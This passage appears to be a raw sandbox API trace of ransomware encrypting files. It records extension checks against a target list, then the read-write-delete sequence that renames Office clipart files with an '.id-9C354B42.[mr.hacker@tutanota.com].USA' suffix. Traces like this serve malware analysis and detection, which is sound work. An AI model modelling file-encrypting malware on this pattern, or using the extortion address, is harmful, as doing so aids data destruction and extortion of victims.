[0053.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.452] lstrlenW (lpString=".doc") returned 4 [0053.452] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.452] lstrlenW (lpString=".docx") returned 5 [0053.452] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.452] lstrlenW (lpString=".pdf") returned 4 [0053.452] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.452] lstrlenW (lpString=".xls") returned 4 [0053.452] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.452] lstrlenW (lpString=".xlsx") returned 5 [0053.452] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.452] lstrlenW (lpString=".ppt") returned 4 [0053.452] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.452] lstrlenW (lpString=".zip") returned 4 [0053.452] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.453] lstrlenW (lpString=".rar") returned 4 [0053.453] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.453] lstrlenW (lpString=".bz2") returned 4 [0053.453] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.453] lstrlenW (lpString=".7z") returned 3 [0053.453] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.453] lstrlenW (lpString=".dbf") returned 4 [0053.453] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.453] lstrlenW (lpString=".1cd") returned 4 [0053.453] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.453] lstrlenW (lpString=".jpg") returned 4 [0053.453] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.620] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.620] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0053.621] GetLastError () returned 0x0 [0053.621] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xbd2, lpOverlapped=0x0) returned 1 [0053.622] WriteFile (in: hFile=0x228, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xbe0, lpOverlapped=0x0) returned 1 [0053.623] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.623] WriteFile (in: hFile=0x228, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.624] SetEndOfFile (hFile=0x228) returned 1 [0053.624] CloseHandle (hObject=0x228) returned 1 [0053.624] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.624] SetEndOfFile (hFile=0x210) returned 1 [0053.625] CloseHandle (hObject=0x210) returned 1 [0053.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.625] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf")) returned 1 [0053.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0053.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0053.625] lstrlenW (lpString=".doc") returned 4 [0053.625] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.625] lstrlenW (lpString=".docx") returned 5 [0053.625] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.625] lstrlenW (lpString=".pdf") returned 4 [0053.625] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.625] lstrlenW (lpString=".xls") returned 4 [0053.625] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.626] lstrlenW (lpString=".xlsx") returned 5 [0053.626] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.626] lstrlenW (lpString=".ppt") returned 4 [0053.626] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0053.626] lstrlenW (lpString=".zip") returned 4 [0053.626] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.626] lstrlenW (lpString=".rar") returned 4 [0053.626] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.626] lstrlenW (lpString=".bz2") returned 4 [0053.626] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.626] lstrlenW (lpString=".7z") returned 3 [0053.626] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0053.626] lstrlenW (lpString=".dbf") returned 4 [0053.626] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0053.626] lstrlenW (lpString=".1cd") returned 4 [0053.626] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0053.626] lstrlenW (lpString=".jpg") returned 4 [0053.626] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.626] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.626] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0053.627] GetLastError () returned 0x0 [0053.627] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x127e, lpOverlapped=0x0) returned 1 [0053.628] WriteFile (in: hFile=0x228, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1280, lpOverlapped=0x0) returned 1 [0053.630] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.630] WriteFile (in: hFile=0x228, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.630] SetEndOfFile (hFile=0x228) returned 1 [0053.630] CloseHandle (hObject=0x228) returned 1 [0053.630] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.630] SetEndOfFile (hFile=0x210) returned 1 [0053.631] CloseHandle (hObject=0x210) returned 1 [0053.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.631] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf")) returned 1 [0053.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.632] lstrlenW (lpString=".doc") returned 4 [0053.632] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.632] lstrlenW (lpString=".docx") returned 5 [0053.632] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.632] lstrlenW (lpString=".pdf") returned 4 [0053.632] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.632] lstrlenW (lpString=".xls") returned 4 [0053.632] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.632] lstrlenW (lpString=".xlsx") returned 5 [0053.632] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.632] lstrlenW (lpString=".ppt") returned 4 [0053.632] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.632] lstrlenW (lpString=".zip") returned 4 [0053.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.632] lstrlenW (lpString=".rar") returned 4 [0053.632] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.632] lstrlenW (lpString=".bz2") returned 4 [0053.632] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.632] lstrlenW (lpString=".7z") returned 3 [0053.632] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.632] lstrlenW (lpString=".dbf") returned 4 [0053.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.633] lstrlenW (lpString=".1cd") returned 4 [0053.633] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.633] lstrlenW (lpString=".jpg") returned 4 [0053.633] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.635] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.635] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0053.635] GetLastError () returned 0x0 [0053.635] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x1634, lpOverlapped=0x0) returned 1 [0053.637] WriteFile (in: hFile=0x228, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1640, lpOverlapped=0x0) returned 1 [0053.638] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.638] WriteFile (in: hFile=0x228, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.638] SetEndOfFile (hFile=0x228) returned 1 [0053.638] CloseHandle (hObject=0x228) returned 1 [0053.638] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.638] SetEndOfFile (hFile=0x210) returned 1 [0053.639] CloseHandle (hObject=0x210) returned 1 [0053.639] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.639] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf")) returned 1 [0053.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0053.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0053.640] lstrlenW (lpString=".doc") returned 4 [0053.640] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.640] lstrlenW (lpString=".docx") returned 5 [0053.640] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.640] lstrlenW (lpString=".pdf") returned 4 [0053.640] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.640] lstrlenW (lpString=".xls") returned 4 [0053.640] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.640] lstrlenW (lpString=".xlsx") returned 5 [0053.640] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.640] lstrlenW (lpString=".ppt") returned 4 [0053.640] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0053.640] lstrlenW (lpString=".zip") returned 4 [0053.640] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.640] lstrlenW (lpString=".rar") returned 4 [0053.640] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.640] lstrlenW (lpString=".bz2") returned 4 [0053.640] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.640] lstrlenW (lpString=".7z") returned 3 [0053.640] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0053.640] lstrlenW (lpString=".dbf") returned 4 [0053.640] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0053.640] lstrlenW (lpString=".1cd") returned 4 [0053.640] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0053.640] lstrlenW (lpString=".jpg") returned 4 [0053.640] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.641] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.641] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0053.641] GetLastError () returned 0x0 [0053.641] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x5062, lpOverlapped=0x0) returned 1 [0053.643] WriteFile (in: hFile=0x228, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x5070, lpOverlapped=0x0) returned 1 [0053.644] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.644] WriteFile (in: hFile=0x228, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.644] SetEndOfFile (hFile=0x228) returned 1 [0053.644] CloseHandle (hObject=0x228) returned 1 [0053.644] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.644] SetEndOfFile (hFile=0x210) returned 1 [0053.645] CloseHandle (hObject=0x210) returned 1 [0053.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.645] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf")) returned 1 [0053.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0053.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0053.646] lstrlenW (lpString=".doc") returned 4 [0053.646] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.646] lstrlenW (lpString=".docx") returned 5 [0053.646] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.646] lstrlenW (lpString=".pdf") returned 4 [0053.646] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.646] lstrlenW (lpString=".xls") returned 4 [0053.646] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.646] lstrlenW (lpString=".xlsx") returned 5 [0053.646] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.646] lstrlenW (lpString=".ppt") returned 4 [0053.646] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0053.646] lstrlenW (lpString=".zip") returned 4 [0053.646] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.646] lstrlenW (lpString=".rar") returned 4 [0053.646] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.646] lstrlenW (lpString=".bz2") returned 4 [0053.646] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.646] lstrlenW (lpString=".7z") returned 3 [0053.646] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0053.646] lstrlenW (lpString=".dbf") returned 4 [0053.646] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0053.646] lstrlenW (lpString=".1cd") returned 4 [0053.646] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0053.647] lstrlenW (lpString=".jpg") returned 4 [0053.647] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.647] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.648] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0053.648] GetLastError () returned 0x0 [0053.648] ReadFile (in: hFile=0x208, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x2a50, lpOverlapped=0x0) returned 1 [0053.649] WriteFile (in: hFile=0x210, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x2a60, lpOverlapped=0x0) returned 1 [0053.650] ReadFile (in: hFile=0x208, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.650] WriteFile (in: hFile=0x210, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.650] SetEndOfFile (hFile=0x210) returned 1 [0053.651] CloseHandle (hObject=0x210) returned 1 [0053.651] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.651] SetEndOfFile (hFile=0x208) returned 1 [0053.651] CloseHandle (hObject=0x208) returned 1 [0053.652] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.652] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf")) returned 1 [0053.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0053.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0053.652] lstrlenW (lpString=".doc") returned 4 [0053.652] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.652] lstrlenW (lpString=".docx") returned 5 [0053.652] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.652] lstrlenW (lpString=".pdf") returned 4 [0053.652] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.652] lstrlenW (lpString=".xls") returned 4 [0053.652] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.652] lstrlenW (lpString=".xlsx") returned 5 [0053.652] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.652] lstrlenW (lpString=".ppt") returned 4 [0053.652] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0053.652] lstrlenW (lpString=".zip") returned 4 [0053.652] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.652] lstrlenW (lpString=".rar") returned 4 [0053.652] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.653] lstrlenW (lpString=".bz2") returned 4 [0053.653] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.653] lstrlenW (lpString=".7z") returned 3 [0053.653] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0053.653] lstrlenW (lpString=".dbf") returned 4 [0053.653] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0053.653] lstrlenW (lpString=".1cd") returned 4 [0053.653] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0053.653] lstrlenW (lpString=".jpg") returned 4 [0053.653] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.653] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: 